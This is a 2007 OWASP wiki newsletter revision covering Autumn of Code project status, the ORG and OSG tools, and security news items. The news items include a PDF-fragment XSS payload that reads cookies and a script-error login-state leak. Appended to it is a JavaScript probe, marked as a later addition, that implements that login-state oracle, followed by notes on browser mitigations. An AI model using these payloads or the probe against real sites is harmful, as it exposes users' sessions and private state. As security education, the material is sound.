OWASP Newsletter 1

Revision as of 05:46, 8 January 2007 by Aholmes (talk | contribs) (AoC update)


OWASP News – December 25th 2006 to December 31st 2006

Happy Holidays from all of us at OWASP!

I would like to take a moment to welcome you all to our first edition of the OWASP weekly newsletter and introduce myself. My name is Aaron Holmes and I have had the pleasure of maintaining the OWASP Autumn of Code 2006 Web Developer Project. It has been a rewarding and educational experience for me, and I feel OWASP has benefited greatly from the many excellent projects which have been developed and advanced through the AoC 2006 program. With all this activity and excitement, we have decided that we should produce and distribute a weekly newsletter to keep everyone up to date on the direction of OWASP and our many great projects. We invite your feedback and news submissions, which can be sent to me directly by emailing [email protected]. Enjoy!

In next week's newsletter we will take a deeper look at a few of the projects mentioned below and explain how they can benefit you.

Until next week, happy coding!

Aaron M. Holmes
OWASP Weekly Newsletter Editor and Website Developer

AoC update

[dinis note: rewrite this with details of where we are today. Put special focus on the projects that are completed (also indicate the two projects that will have the extra month)]

[Aaron note: Rewrote section with basic project information. Feel free to update - perhaps the 3 outstanding projects now have status updated :)]

The end of 2006 marks an important time for OWASP with the successful completion of the Autumn of Code 2006. Four of the nine original projects have been completed and are now officially closed: CAL9000, OSG and ORG, the Testing Guide, and the website. Three more are nearing completion and will be finalized in the very near future: Pantera, Sherif, and OWASP Tiger (formerly named Tools). The remaining two, WebScarab NX and LiveCD, have been granted one-month project extensions.

All projects have seen great developments which have been made possible by the hard work and efforts of our AoC participants, project leaders, and community members.

Featured Project - Aaron (use ORG and OSG instead)

OWASP Report Generator (ORG) and OWASP Site Generator (OSG) are projects that have recently been updated through the Autumn of Code.

ORG was originally written by Dinis Cruz to meet his own need to report the results of security assessments to many different audiences. With ORG you can set up and track assessments: record findings, track each finding until it is fixed, and run reports tailored to the different audiences an assessment was done for.

OSG is a teaching tool that generates basic sites which exhibit chosen vulnerabilities. This lets those teaching security give specific, concrete examples of problems, and lets developers look at real vulnerable code. {put description here}

Latest additions to the Wiki

OWASP Community

OWASP related events, such as chapter meetings, OWASP conferences, get-togethers, and OWASP sponsored events.

OWASP News Headlines (from website)

  • Jan 2 - The Best Security Books Reference OWASP - There are over 50 security books that reference OWASP. Many of the authors are contributing to OWASP, speaking at our conferences, and participating in our chapters. Some of the books just recommend OWASP, but many are structured around OWASP, and others have whole chapters dedicated to our tools.
  • Nov 28 - JBroFuzz 0.3 Released - This version adds a more stable core, length updating for fuzzed POST requests and allows you to specify your own fuzz vectors in a separate file.
  • Nov 26 - OWASP Report Generator 0.88 Released - A tool for security consultants that supports the documentation and reporting of security vulnerabilities discovered during security.
  • Nov 26 - OWASP Site Generator v.70 Released - A tool that allows the creation of dynamic websites based on XML files and predefined vulnerabilities (some simple, some complex) for testing application security tools.
  • Nov 12 - New OWASP App Security Search Engine - We're beta-testing a new Google-powered search engine for application security. The engine indexes the OWASP site and all the other sites dedicated to application security on the Internet.

Application Security News (from

  • Jan 3 - XSS in ALL sites with PDF download - A critical, trivially exploitable XSS flaw affecting every site that serves PDFs. The attacker appends a fragment such as #attack=javascript:alert(document.cookie); to ANY URL that ends in .pdf (or streams a PDF); the Adobe Reader browser plug-in (versions prior to 8.0) evaluates the fragment as script, so it runs in the origin of the site hosting the PDF. Because a URL fragment is never sent to the server, no server-side filtering can catch it. Short of Adobe patching the planet, the options are to stop rendering PDFs inline (for example, force them to download with Content-Disposition: attachment) or to not use PDFs at all.
  • Dec 14 - JavaScript error handler leaks information - An attacker can find out whether you're logged into your favorite website. Their page includes a script tag whose src attribute points not at a script but at a page on that site, so your browser fetches it with your cookies and tries to parse the returned HTML as JavaScript. The parse fails, and the error delivered to the attacker's window.onerror handler (message and line number) differs between the logged-in page and the login redirect, so the attacker learns which one came back. The same trick distinguishes any two state-dependent responses, so it extends easily to probing access-control decisions. Protect yourself as you would against CSRF: an unguessable per-session token in the URL denies the attacker a fixed address to point a script tag at.
  • Dec 13 - UCLA spins massive breach - Why not just say what measures you've really taken? Are all developers trained? Do you do code review and security testing? "Jim Davis, UCLA's chief information officer, said a computer trespasser used a program designed to exploit an undetected software flaw to bypass all security measures and gain access to the restricted database that contains information on about 800,000 current and former students, faculty and staff, as well as some student applicants and parents of students or applicants who applied for financial aid. 'In spite of our diligence, a sophisticated hacker found and exploited a subtle vulnerability in one of hundreds of applications,' Davis said in the statement."
  • Dec 2 - Oracle blames security researchers - "We do not credit security researchers who disclose the existence of vulnerabilities before a fix is available. We consider such practices, including disclosing 'zero day' exploits, to be irresponsible." So the question on everybody's mind - is the Oracle Software Security Assurance program real? Or are David Litchfield and Cesar Cerrudo right that the Emperor has no clothes?
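The Dec 14 item above describes a login-state oracle built on script parse errors. The code below is an added illustration written for this edit; it is not from the OWASP newsletter or from any OWASP project. It shows the browser-side probe that loads a target page as a script and the classifier that turns what window.onerror reports into a state. The target URL, the line-number signatures and all function names are hypothetical; an attacker would collect the signatures by loading the URL once logged in and once logged out and noting the line number of the resulting parse error.

```javascript
// Added example, not from the OWASP newsletter or any OWASP project.
// A cross-site login-state oracle built on the script-parse-error leak.
// All URLs, names and signature values below are hypothetical.

// Hypothetical fingerprints for https://victim.example/account loaded as a
// <script>: the logged-in page and the login-form redirect are different HTML,
// so they fail to parse at different line numbers. An attacker collects these
// by loading the URL once in each state and noting what window.onerror reports.
const SIGNATURES = {
  "logged-in": { line: 12 },   // hypothetical value
  "logged-out": { line: 3 },   // hypothetical value
};

// Pure classifier over what window.onerror reported. Modern browsers mask
// cross-origin script errors as "Script error." with line 0; that case is
// reported as "masked" so the caller knows the oracle has been closed rather
// than mistaking it for a third page state.
function classifyScriptError(message, lineno, signatures) {
  if (lineno === 0 || /^Script error\.?$/.test(String(message))) {
    return "masked";
  }
  for (const [state, sig] of Object.entries(signatures)) {
    if (sig.line === lineno) {
      return state;
    }
  }
  return "unknown";
}

// Browser-side probe: inject <script src=url>, capture the first error the
// browser reports, and resolve with the classified state. Nothing here touches
// window or document until the function is actually called in a browser.
function probeLoginState(url, signatures, timeoutMs = 3000) {
  return new Promise((resolve) => {
    let done = false;
    const previousHandler = window.onerror;
    const script = document.createElement("script");

    function finish(state) {
      if (done) return;
      done = true;
      window.onerror = previousHandler;
      script.remove();
      resolve(state);
    }

    // The HTML response fails to parse as JavaScript; the browser reports the
    // SyntaxError here, and its line number fingerprints which page came back.
    window.onerror = (message, source, lineno) => {
      finish(classifyScriptError(message, lineno, signatures));
      return true; // suppress the console entry
    };
    // A response that parsed cleanly carries no parse-error fingerprint.
    script.onload = () => finish("parsed-as-script");
    // A network failure, or the browser refusing to execute the response
    // (for example under X-Content-Type-Options: nosniff), surfaces here.
    script.onerror = () => finish("not-executed");
    script.src = url;
    document.head.appendChild(script);
    setTimeout(() => finish("timeout"), timeoutMs);
  });
}

// Example call (browser only):
// probeLoginState("https://victim.example/account", SIGNATURES).then(console.log);
```

Browsers of 2006 handed the full message and line number of a cross-origin script error to window.onerror, which is the leak the item describes. Current browsers report such errors only as "Script error." with line 0 unless the script is loaded with a crossorigin attribute and the server answers with matching CORS headers, so the probe above returns "masked" against them. On the server side, X-Content-Type-Options: nosniff makes the browser refuse to execute an HTML response as script, and a SameSite session cookie keeps the cookie off the cross-site request, so both page states produce the same result and there is nothing left to fingerprint.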